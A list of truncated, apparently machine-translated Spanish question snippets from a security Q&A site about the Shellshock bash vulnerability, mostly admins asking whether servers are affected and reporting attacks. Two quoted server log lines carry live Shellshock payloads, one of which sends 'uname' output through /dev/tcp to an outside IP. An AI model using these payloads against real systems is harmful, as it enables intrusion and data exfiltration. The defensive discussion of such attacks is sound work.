Soy un estudiante graduado. Estamos buscando un sitio remoto para realizar shellshock con fines educativos. ¿Sitios que son voluntariamente vulnerables por motivos de piratería ética?
Con la tarjeta de registro en la mano, ayer fui a registrar una herramienta eléctrica recién comprada. Pero cuando llegué al sitio del fabricante, me recibió una antigua interfaz propia que tenía la marca "Copyright (C) 2004" y se parecía a HTML...
Entiendo que ejecutar apache / mod_php es seguro, pero no he escuchado sobre el caso de ejecutar php en modo fastcgi (a través de nginx / php5-fpm), entonces, ¿alguien puede confirmar que esto también es seguro?
Hace unos días, alguien probó una serie de solicitudes en nuestra instancia de nginx. Todos fallaron excepto uno.
54.164.156.8 - - [**/Mar/2015:**********] "GET / HTTP/1.1" 200 393 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/p...
Dado , es un requisito frecuente permitir a los usuarios sin privilegios acceso restringido a funciones privilegiadas: los administradores de sistemas de trabajo a veces proporcionan esto en forma de shellscripts, que luego se invocan a través...
Estoy intentando averiguar si mis dispositivos son vulnerables a bash shellshock. He ejecutado los comandos que se encuentran en enlace . Parece que mis dispositivos son susceptibles a una sola de las vulnerabilidades: Exploit 7 CVE-2014-6277,...
Acabo de encontrar esta entrada en uno de mis servidores:
213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.2...
Administro un servidor público que recibe aproximadamente una descarga de shell HTTP de 100 csh por día desde diferentes fuentes. Es un método HTTP GET que solicita el URI /cgi-bin/authLogin.cgi.
Sabiendo que el URI solicitado no existe en mi...
Me preguntaba por qué funciona Shellshock cuando se coloca en el agente de usuario.
Según lo que pude encontrar, es porque un servidor web (por ejemplo, Apache) utiliza la cadena de usuario en su funcionamiento interno.
¿Por qué a un serv...